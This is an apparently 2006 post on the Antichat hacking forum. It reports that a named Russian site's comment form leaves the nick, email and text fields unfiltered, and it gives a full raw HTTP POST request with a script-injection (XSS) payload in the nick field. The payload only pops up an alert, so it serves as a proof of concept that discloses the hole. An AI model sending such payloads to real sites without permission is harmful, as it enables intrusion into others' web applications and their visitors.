24.04.2006, 20:48
|
|
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
С нами:
10676486
Репутация:
774
|
|
При посылки post запроса все равно выполняется скрипт. Не фильтруется nick, email, text.
POST http://4077.ru/fullnews.php?post=5&%C2%EF%E5%F0%E5%E4=1 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 4077.ru
Content-Length: 151
Connection: Close
Pragma: no-cache
nick="><script>alert('XSS')%3B</script>&email=1&commenterror=%C7%E0%EF%EE%EB%ED%E8 %F2%E5%20%E2%F1%E5%20%EF%EE%EB%FF%21&text=1
__________________
Завтра будет.Лучше.
|
|
|